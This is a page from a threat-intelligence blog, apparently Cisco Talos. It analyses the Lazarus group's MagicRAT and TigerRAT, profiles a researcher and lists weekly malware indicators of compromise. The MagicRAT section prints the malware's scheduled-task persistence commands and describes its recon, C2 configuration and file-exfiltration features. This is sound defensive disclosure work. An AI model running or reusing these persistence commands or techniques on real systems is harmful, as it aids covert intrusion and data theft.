Normal view

There are new articles available, click to refresh the page.
Before yesterdayCisco Talos

MagicRAT: Lazarus’ latest gateway into victim networks

7 September 2022 at 12:01










By Jung soo An, Asheer Malhotra and Vitor Ventura.

  • Cisco Talos has discovered a new remote access trojan (RAT) we're calling "MagicRAT," developed and operated by the Lazarus APT group, which the U.S. government believes is a North Korean state-sponsored actor.
  • Lazarus deployed MagicRAT after the successful exploitation of vulnerabilities in VMWare Horizon platforms.
  • We've also found links between MagicRAT and another RAT known as "TigerRAT," disclosed and attributed to Lazarus by the Korean Internet & Security Agency (KISA) recently.
  • TigerRAT has evolved over the past year to include new functionalities that we illustrate in this blog.



Executive Summary


Cisco Talos has discovered a new remote access trojan (RAT), which we are calling "MagicRAT," that we are attributing with moderate to high confidence to the Lazarus threat actor, a state-sponsored APT attributed to North Korea by the U.S. Cyber Security & Infrastructure Agency (CISA). This new RAT was found on victims that had been initially compromised through the exploitation of publicly exposed VMware Horizon platforms. While being a relatively simple RAT capability-wise, it was built with recourse to the Qt Framework, with the sole intent of making human analysis harder, and automated detection through machine learning and heuristics less likely.

We have also found evidence to suggest that once MagicRAT is deployed on infected systems, it launches additional payloads such as custom-built port scanners. Additionally, we've found that MagicRAT's C2 infrastructure was also used to host newer variants of known Lazarus implants such as TigerRAT.

The discovery of MagicRAT in the wild is an indication of Lazarus' motivations to rapidly build new, bespoke malware to use along with their previously known malware such as TigerRAT to target organizations worldwide.


Actor profile





Attribution


Cisco Talos assesses with moderate to high confidence these attacks have been conducted by the North Korean state-sponsored threat actor Lazarus Group. This attribution is based on tactics, techniques and procedures (TTPs), malware implants and infrastructure overlap with known Lazarus campaigns.

We have observed overlaps in C2 servers serving MagicRAT and previously disclosed Lazarus campaigns utilizing the Dtrack RAT family. Furthermore, Talos has also discovered C2 servers hosting and serving TigerRAT to existing MagicRAT infections. TigerRAT is a malware family attributed to the Lazarus APT groups by the Korean Internet & Security Agency (KISA).

In some infections, we observed the deployment of MagicRAT by the attackers for some time, followed by its removal and the subsequent download and execution of another custom-developed malware called "VSingle," another implant disclosed and attributed to Lazarus by JPCERT.


Technical analysis


MagicRAT

MagicRAT is programmed in C++ programming language and uses the Qt Framework by statically linking it to the RAT on 32- and 64-bit versions. The Qt Framework is a programming library for developing graphical user interfaces, of which this RAT has none. Talos believes that the objective was to increase the complexity of the code, thus making human analysis harder. On the other hand, since there are very few examples (if any) of malware programmed with Qt Framework, this also makes machine learning and heuristic analysis detection less reliable.

The 32-bit version was compiled with GCC v3.4 using mingw/cygwin for support on the Microsoft Windows platform, the 64-bit version, however, was compiled with VisualC64, version 7.14.

The RAT uses the Qt classes throughout its entire code. The configuration is dynamically stored in a QSettings class eventually being saved to disk, a typical functionality provided by that class.

The malware configuration (containing author-defined QSettings) is stored in the file "visual.1991-06.com.microsoft_sd.kit" in the path "\ProgramData\WindowsSoftwareToolkit"- names and paths obviously chosen to trick the victim into believing they were part of the operating system.

The image below shows an example of a configuration file. During our analysis, we identified three sections in the configuration file:

  • [os] which contains the command and control (C2) URLs.
  • [General] which holds general information.
  • [company] which holds data used in the communication with the C2.


All analyzed samples had three encoded C2 URLs that are used to register infections and then receive commands to execute on the infected endpoint. The URLs are stored in the configuration file with the keys "windows", "linux" and "mac." The values are prefixed with "LR02DPt22R" followed by the URL encoded in base64.

Upon execution, MagicRAT achieves persistence for itself by executing a hardcoded command that creates scheduled tasks on the victim machine.

Command Intent
schtasks /create /tn "OneDrive AutoRemove" /tr "C:\Windows\System32\cmd.exe /c del /f /q C:/TEMP/[MagicRAT_file_name].exe" /sc daily /st 10:30:30 /ru SYSTEM Scheduled task starting at a specific time [T1053/005]
schtasks /create /tn "Microsoft\Windows\light Service Manager" /tr C:/TEMP/[MagicRAT_file_name].exe /sc onstart /ru SYSTEM Scheduled task starting at a different time an path [T1053/005]
%HOME%/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/OneNote.lnk Link created on startup folder [T1547/001]

Upon achieving persistence, the RAT contacts the C2.




During the initial stages of execution, MagicRAT will perform just enough system reconnaissance to identify the system and environment in which the attackers are operating. This is done by executing the commands whoami, systeminfo and ipconfig /all. The last command has its results returned via the upload of the file zero_dump.mix to the C2.

MagicRAT is rather simple — it provides the operator with a remote shell on the victim's system for arbitrary command execution, along with the ability to rename, move and delete files on the endpoint. The operator can determine the timing for the implant to sleep, change the C2 URLs and delete the implant from the infected system.

We also discovered a new variant of MagicRAT in the wild generated in April 2022. This sample now consisted of the ability to delete itself from the infected endpoint using a BAT file.



Additional malware


One of the C2 servers used by the new MagicRAT sample, 64[.]188[.]27[.]73, hosted two more distinct implants masquerading as GIF URLs. Now, MagicRAT can make requests to its C2 and download a GIF file, which is actually an executable.

 

Lightweight port scanner

One of the GIF files discovered on the MagicRAT C2 is called "pct.gif," which is an extremely simple port scanner, whose main code fits into the image below.

It takes three arguments: The IP to connect to, followed by the port number and, finally, a value dictating whether the output of the port scan must be written to a log file on disk or the standard output. After a successful connection, the executable will either write the string "Connection success!" to the standard output or to a log file called "Ahnupdate.log" located in the current user's temporary directory.


TigerRAT

The second implant hosted on MagicRAT's C2 is a remote access trojan (RAT) known as TigerRAT. TigerRAT is an implant disclosed in 2021 by KISA and KRCERT as part of "Operation ByteTiger'' detailing TigerRAT and its downloader "TigerDownloader."

This implant consists of several RAT capabilities, ranging from arbitrary command execution to file management. Capabilities of the implant include:

  • Gather system information: username, computer name, network interface info, system info including product and version.
  • Run arbitrary commands on the endpoint: set/get CWD, run command via cmd.exe

Implant capability to run arbitrary commands.
  • Screen capture.
  • Socks tunneling.
  • Keylogging.
  • File Management: drive reconnaissance, enumerate/delete files, create and write to files, read files and upload contents to C2, create processes,
  • Self delete/uninstall from system.
The latest TigerRAT versions included one new capability with indicators of a second capability set to be introduced soon. One of these capabilities is called "USB dump." The authors have also created skeleton code in preparation for implementing video capture from Web cameras, though it hasn't been implemented yet.


USB Dump


The USB Dump capability gives the attackers the ability to:

  • Enumerate files for path "LOCAL_APPDATA\GDIFONTC".
  • Delete files.
  • Find files of specific extensions in a specified drive and folder: .docx, .hwp, .doc, .txt, .pdf, .zip, .zoo, .arc, .lzh, .arj, .gz, .tgz. Add these files to an existing archive - in preparation for exfiltration. This is the main functionality of this new capability.

The image below shows the code used to check the file extensions.



Lazarus' implants commonly stitch together functionalities, including occasionally removing and adding different functions, which is evident from the latest TigerRAT samples:

While Lazarus added a new capability (USB dumping and skeleton code for Webcam capture) they removed the port forwarding capability in the latest version. Older variants of TigerRAT (seen in 2020-2021) consisted of encrypted strings but the latest variant consists of strings in plaintext.


Coverage


Ways our customers can detect and block this threat are listed below.



Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.


Orbital Queries

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here.



IOCs

The IOC list is also available in Talos' Github repo here.


MagicRAT

f6827dc5af661fbb4bf64bc625c78283ef836c6985bb2bfb836bd0c8d5397332


TigerRAT

f78cabf7a0e7ed3ef2d1c976c1486281f56a6503354b87219b466f2f7a0b65c4
1f8dcfaebbcd7e71c2872e0ba2fc6db81d651cf654a21d33c78eae6662e62392
bffe910904efd1f69544daa9b72f2a70fb29f73c51070bde4ea563de862ce4b1
196fb1b6eff4e7a049cea323459cfd6c0e3900d8d69e1d80bffbaabd24c06eba


TigerRAT unpacked

1c926fb3bd99f4a586ed476e4683163892f3958581bf8c24235cd2a415513b7f
f32f6b229913d68daad937cc72a57aa45291a9d623109ed48938815aa7b6005c
23eff00dde0ee27dabad28c1f4ffb8b09e876f1e1a77c1e6fb735ab517d79b76
ca932ccaa30955f2fffb1122234fb1524f7de3a8e0044de1ed4fe05cab8702a5


Port Scanner

d20959b615af699d8fff3f0087faade16ed4919355a458a32f5ae61badb5b0ca


URLs

hxxp[://]64[.]188[.]27[.]73/adm_bord/login_new_check[.]php
hxxp[://]gendoraduragonkgp126[.]com/board/index[.]php
hxxp[://]64[.]188[.]27[.]73/board/mfcom1.gif
hxxp[://]64[.]188[.]27[.]73/board/pct.gif
hxxp[://]64[.]188[.]27[.]73/board/logo_adm_org.gif
hxxp[://]64[.]188[.]27[.]73/board/tour_upt.html


IPs

193[.]56[.]28[.]251
52[.]202[.]193[.]124
64[.]188[.]27[.]73
151[.]106[.]2[.]139
66[.]154[.]102[.]91



Researcher Spotlight: How Asheer Malhotra looks for ‘instant gratification’ in threat hunting

6 September 2022 at 12:00

The India native has transitioned from a reverse-engineer hobbyist to a public speaker in just a few years

 
By Jon Munshaw. 

Ninety percent of Asheer Malhotra’s work will never see the light of day. But it’s that 10 percent that keeps him motivated to keep looking for something new. 

The Talos Outreach researcher spends most of his days looking into potential new threats. Many times, that leads to dead ends of threats that have already been discovered and blocked or don’t have any additional threads to pull on. 

But eventually, the “lightbulb goes off,” as he puts it, which indicates something is a new threat the wider public needs to know about. During his time at Talos, Malhotra has spent much of his time looking into cyber attacks and state-sponsored threat actors in Asia, like the Transparent Tribe group he’s written about several times. 

“At some point, I say ‘Hey, I don’t think I’ve seen this before.’ I start analyzing public disclosures, and slowly start gaining confidence and being able to craft a narrative around the motivations and tactics around a specific threat actor or malware campaign,” he said.

In the case of Transparent Tribe, Malhotra’s tracked their growth as a major player in the threat landscape in Asia, as they’ve added several remote access trojans to their arsenal, targeted high-profile government-adjacent entities in India and expanded their scope across the region.  

When he’s not threat hunting, Malhotra also speaks to Cisco customers about the current state of cybersecurity in briefings and delivers presentations at conferences around the world (mainly virtually during the COVID-19 pandemic).  

“I always try to find the latest and new stuff to talk about. … I’ve been honing my skills and trying to speak more confidently publicly, but the confidence is backed up with the right kind of knowledge and the threat intelligence, that’s what helps me succeed,” he said.  

Malhotra is a native of India and spent most of his life there before coming to the U.S. for his master’s degree at Mississippi State University. Mississippi was a far cry from everything else he had known up until that point, but he quickly adjusted. 

“That was the ‘Deep South,’” he said. “So there was a culture shock, but the southern hospitality is such a real thing, and it felt very normal there.” 

Growing up, Malhotra always knew he wanted to work with computers, starting out as a teenager reverse-engineering exploits he’d see others talk about on the internet or just poking at smaller applications. His additional interest in politics and national security made it natural for him to combine the two and focus his research on state-sponsored actors.  

He enjoys continuing his research in the Indian subcontinent and sees many parallels between the state of security in India and the U.S. 

“These days, the Indian security scene is really budding, there’s a lot of high-profile conferences there. IT, computer science and technology is huge there, and a lot of tech companies have offices there,” he said.  

Because of India’s high concentration of tech companies, higher education and government contractors, his main concern currently is intellectual property theft. While many of the recent cybersecurity headlines center on more recent, “sexier” ransomware attacks, it’s threat actors’ double-extortion tactics that worry him the most.  

In these types of attacks, adversaries will hold files hostage for a paid ransom, following the lines of a traditional ransomware attack. But many actors are starting to threaten to leak that stolen information on the wider internet for all to see (and potentially steal or buy).  

Malhotra called ransomware the “clear and present danger” but that double extortion is becoming top-of-mind for many executives.  

The specific state-sponsored actors he’s tracked in the Asia-Pacific region, such as Transparent Tribe and MuddyWater, have matured over the years, as has Malhotra’s security experience. 

“I love seeing how these groups with different levels of competencies and skillsets try to infect their targets,” he said. “And how they’ve evolved since, say, 2016... Their net of victims has expanded, and you see the evolution of their tactics, and it’s fascinating to learn how they operate.” 

The actors and campaigns Malhotra finds often made for some entertainment, too. His work researching the newly discovered Manjusaka framework led to the now-famous “cow poop” illustration on Talos’ Twitter, and the Transparent Tribe leopard is a favorite among Talos’ “malware mascots” sticker collection

These discoveries come in a variety of forms. Malhotra said he relies on everything from open-source intelligence, Talos honeypots, telemetry sources and independent research. While this research mainly ends up manifesting itself in one of Talos’ blog posts or a presentation to a customer, Malhotra says he gets the most excitement from knowing he’s making it harder for the threat actor to strike again. While we as defenders may never be able to detect and stop every single cyber threat out there, Malhotra says the goal is to make it more expensive and more cumbersome every time for the attacker. 

“When we disclose a specific operation or campaign, the intention is to burn that campaign so [the actor] has to go back and innovate again and come up with some new TTPs [tactics, techniques and procedures],” he said. “That’s what we’re trying to do — reduce the level of motivation that they have." 

Threat Roundup for August 26 to September 2

2 September 2022 at 19:55

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 26 and Sept. 2. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Dropper.DarkKomet-9966191-0 Dropper DarkKomet is a freeware remote access trojan that was released by an independent software developer. It provides the same functionality you would expect from a remote access tool: keylogging, webcam access, microphone access, remote desktop, URL download, program execution, etc.
Win.Packed.AgentTesla-9966126-1 Packed AgentTesla is a Remote Access Trojan that records keystrokes and attempts to steal sensitive information from web browsers and other installed applications.
Win.Virus.Xpiro-9965977-1 Virus Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Dropper.Nanocore-9965501-0 Dropper Nanocore is a .NET remote access trojan. Its source code has been leaked several times, making it widely available. Like other RATs, it allows full control of the system, including recording video and audio, stealing passwords, downloading files and recording keystrokes.
Win.Packed.Bandook-9965180-1 Packed Bandook is a remote-access trojan (RAT) written in C++ and Delphi. It provides attackers with several abilities common to RATs such as taking screenshots or file uploading, downloading or executing. Bandook is usually delivered through spear-phishing emails containing malicious attachments.
Win.Ransomware.BlackMatter-9965914-0 Ransomware BlackCat ransomware, also known as "ALPHV", has quickly gained notoriety for being used in double ransom (encrypted files and stolen file disclosure) attacks against companies. It uses the combination of AES128-CTR and RSA-2048 to encrypt the files on victim's computer.
Win.Dropper.Formbook-9965920-0 Dropper Formbook is an information stealer that collects sensitive information from an infected machine by logging keystrokes, stealing saved web browser credentials, and monitoring information copied to the clipboard.

Threat Breakdown

Win.Dropper.DarkKomet-9966191-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 84 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST 18
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
12
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\M-50504578520758924620\winmgr.exe
10
<HKCU>\SOFTWARE\DC3_FEXEC 8
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Microsoft Windows Service
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Microsoft Windows Service
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\M-5050756432604649683503740\winsvc.exe
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DoNotAllowExceptions
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MicroUpdate
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-100
2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-101
2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-103
2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\dhcpqec.dll,-102
2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-1
2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-2
2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-4
2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\napipsec.dll,-3
2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-100
2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-101
2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-102
2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\tsgqec.dll,-103
2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-100
2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-101
2
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @%SystemRoot%\system32\eapqec.dll,-102
2
Mutexes Occurrences
t8 6
DC_MUTEX-<random, matching [A-Z0-9]{7}> 5
t10 4
w3 3
w2 2
DCMIN_MUTEX-WG79R6U 2
uxJLpe1m 1
2562100796 1
lol 1
FvLQ49IlzIyLjj6m 1
e621ca05-Mutex 1
{D9961D0B-0106-5584-AD6D-884HSI64CNI9} 1
{D0001D0B-0106-5584-AD6D-884HSI64CNI9} 1
TLS 1
yourhavebecracked 1
crapponce 1
CCC 1
7QSDIYQXU3 1
DCMIN_MUTEX-W1AEX56 1
2CC 1
4444 1
5555 1
CC02 1
w4 1
e2b9ef1ee9bca34ce51187acb9a0f411 1
*See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
58[.]158[.]177[.]102 3
35[.]205[.]61[.]67 1
198[.]49[.]23[.]144/31 1
20[.]72[.]235[.]82 1
20[.]81[.]111[.]85 1
23[.]221[.]227[.]172 1
184[.]105[.]237[.]196 1
188[.]165[.]227[.]65 1
140[.]228[.]29[.]110 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
srv50[.]ru 11
trik[.]su 11
trkbox[.]ru 6
srv60[.]su 5
srv70[.]ru 4
wrksrv[.]ru 4
markben390[.]no-ip[.]org 3
avget[.]ru 2
microsoft[.]com 1
bermanstreetllc[.]com 1
biggymoney01[.]no-ip[.]biz 1
biggymoney03[.]no-ip[.]biz 1
biggymoney2[.]no-ip[.]biz 1
businessswitchedmylife[.]biz 1
nobemetalkam[.]com 1
heavensbreedonline[.]com 1
heavensbreedonline[.]biz 1
heavensbreedonline[.]co 1
heavensbreedonline[.]org 1
seadeeponline[.]com 1
eurofreightglobalonline[.]com 1
swrenvgloballtd[.]com 1
mailsecuredssl[.]com 1
ssl32bit[.]com 1
128bitsecured[.]com 1
*See JSON for more IOCs
Files and or directories created Occurrences
\autorun.inf 11
\windrv.exe 11
E:\autorun.inf 11
E:\windrv.exe 11
%SystemRoot%\M-50504578520758924620 10
%SystemRoot%\M-50504578520758924620\winmgr.exe 10
%APPDATA%\dclogs 8
%SystemRoot%\M-5050756432604649683503740 3
%SystemRoot%\M-5050756432604649683503740\winsvc.exe 3
%HOMEPATH%\Documents\MSDCSC\msdcsc.exe 2
%TEMP%\a 2
%TEMP%\incl2 2
%SystemRoot%\M-50507564324649683503740\winsvc.exe 2
%TEMP%\c 2
%TEMP%\incl1 2
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 2
%HOMEPATH%\Y44VPhclUOy\lib\images\cursors\win32_LinkNoDrop32x32.gif 1
%HOMEPATH%\Y44VPhclUOy\lib\images\cursors\win32_MoveDrop32x32.gif 1
%HOMEPATH%\Y44VPhclUOy\lib\images\cursors\win32_MoveNoDrop32x32.gif 1
%HOMEPATH%\Y44VPhclUOy\lib\jce.jar 1
%HOMEPATH%\Y44VPhclUOy\lib\jfr.jar 1
%HOMEPATH%\Y44VPhclUOy\lib\jfr\default.jfc 1
%HOMEPATH%\Y44VPhclUOy\lib\jfr\profile.jfc 1
%HOMEPATH%\Y44VPhclUOy\lib\jsse.jar 1
%HOMEPATH%\Y44VPhclUOy\lib\jvm.hprof.txt 1
*See JSON for more IOCs

File Hashes

01d99de8be5d399beb94238ded93f68cecce9b05010ec2095fb88dfea30be905 01dc08a7611de9ed95addbdc484f028da8c4cc4f2f04bf007955e8e7771af2ad 0521c25b0e73636633fc888ecb616c71e37cc63cdef64d531938fb41cb5190c3 07fb7af6f5ebe683cea86ec012a0a002771d658873ea3428d989f8ecaccc2e0b 0b8d380e9ff7c2cdd17b4e95d6663d1b21db1c955b0c933d68bd66c9c8b1b74b 0ce96b476d6d0aeaa983de1cf41c4553f68156d6cbbe9d48ae852ef0e5143de7 0edde1077db95438d2598acd555a39b3c2ac432f98b60d3c77415fd650b13516 1a85cf3317d5a030ab87d02649769a6a0bfb1b342ecc46f1bc26e1f651fbb1ed 1abb5ce77ce286aac491f9363161554eb0894dfb425e4457aee3cd3fc22982e9 1dc5ac655a745dc442a017eb4fe0d86a0877726d4c84a026e8eb3dbe528953f9 234eb8f2d2c1a731eb5672006b5c449761e8536b2f6d4b40d20f54e74d631807 259941e22122288262ef81fd0d0412a9b2725a9a0d77f7c6442020b0733ebbed 2b6326b6b21207fd649683ac43062c06eace7074bbd3f726f200a8717b02c75f 2ba447c32a9cfa066bbc502772d11c9fb62404c090a9de7c83d9aa4151dbf35c 2bc2fc0088f069fb5bb5e448b106a6dc91e5177e00c443571baecac8b8afd8f9 2f6fa4f49fb85c80342285a08bd5fc0b9e3f3198f4854973824567fb131b07e0 32c9b04c79b44e5c331c6497b9c11ce942b53e9fe6d6b57211e2dac442bb4d8b 34e3b029473a25d0eed41532071b5fd8f217e24e31642985324e48e0cd832313 35a047096848277ecedf71875652c55466a6d1a167bb82e810591951d991c0ff 3adb310c1ed97474f55974c05a17c56a89d082eb3069592d5734f91b330a8d96 4326fb1eabf2fd7bde99777bc0283746791e7398cacdf575affe537ab33cf16f 433bedd8a7ee7e1585a93cc9076941d3d31c33c602f116e407da8bddd9db9ea6 44317a91b1c813dc8423423cc5a1130e34264f5ab8cc4b35e05da3b7eaacc3f2 483c61bf01f6404f78a83413bf011e0e86c6adae8cce6e1a622ff1ee6e95c1ee 4bb436856e6c78ebac6ef0f48a76fad96268add5dc1583a0e20b986d4532bce4
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Packed.AgentTesla-9966126-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\OQBAZG7TYHTA203\ATJMVRXU7DWVTQMOVW75
Value Name: wNHJwQzhBIRVra53
11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\OQBAZG7TYHTA203 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\OQBAZG7TYHTA203\ATJMVRXU7DWVTQMOVW75 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\YAPCUBB9WTPSKYCICPURQGTTVZSSZFZV9XZMYAD173 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\YAPCUBB9WTPSKYCICPURQGTTVZSSZFZV9XZMYAD173\ZMD1ZDDSRHXRHJRA7YJEA5BX8K4IU8VF0XR178 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\TNNOKQEOKS91GA2LCMWPH6IIE51 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\TNNOKQEOKS91GA2LCMWPH6IIE51\WZHY5EK0J8ED51 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\YAPCUBB9WTPSKYCICPURQGTTVZSSZFZV9XZMYAD173\ZMD1ZDDSRHXRHJRA7YJEA5BX8K4IU8VF0XR178
Value Name: m2shbluBdxk2hpHhWEya7LtO7ceN81
11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\WNHJWQZHBIRVRA224 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\TNNOKQEOKS91GA2LCMWPH6IIE51\WZHY5EK0J8ED51
Value Name: OqbazG7tyhTA228
11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\WNHJWQZHBIRVRA224\B753 11
<HKCU>\SOFTWARE\VB AND VBA PROGRAM SETTINGS\WNHJWQZHBIRVRA224\B753
Value Name: YapCUbb9WtpskyCIcpUrqGtTVZssZFZv9xzmYaD128
11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: newApp
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: newapp
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE
Value Name: DisableSR
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Registry Key Name
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\system32\DeviceCenter.dll,-2000
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MyyyyZApp
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: services
1
Mutexes Occurrences
Global\536fbb71-288b-11ed-9660-00151721fd34 1
Global\5c7184b1-288b-11ed-9660-001517bb55ad 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
3[.]93[.]18[.]244 1
3[.]217[.]248[.]28 1
34[.]200[.]207[.]31 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
checkip[.]amazonaws[.]com 3
smtp[.]tetenel[.]com 1
mail[.]orncbbq[.]com 1
smtp[.]ssgtoolz[.]net 1
Files and or directories created Occurrences
%TEMP%\<random, matching '[0-9]{15}'>000_<random GUID>.db 9
%APPDATA%\newapp 4
%APPDATA%\newapp\newapp.exe 4
%APPDATA%\Postbox\profiles.ini 2
%System32%\drivers\etc\hosts 1
%HOMEPATH%\subfolder 1
%HOMEPATH%\subfolder\filename.exe 1
%HOMEPATH%\subfolder\filename.vbs 1
%APPDATA%\services 1
%TEMP%\MyyyyZApp 1
%TEMP%\MyyyyZApp\MyyyyZApp.exe 1
%APPDATA%\jddbt225.sux 1
%APPDATA%\jddbt225.sux.zip 1
%APPDATA%\jddbt225.sux\Firefox 1
%APPDATA%\jddbt225.sux\Firefox\Profiles 1
%APPDATA%\jddbt225.sux\Firefox\Profiles\1lcuq8ab.default 1
%APPDATA%\jddbt225.sux\Firefox\Profiles\1lcuq8ab.default\cookies.sqlite 1
%APPDATA%\hqbkc1l0.fyj 1
%APPDATA%\hqbkc1l0.fyj.zip 1
%APPDATA%\hqbkc1l0.fyj\Firefox 1
%APPDATA%\hqbkc1l0.fyj\Firefox\Profiles 1
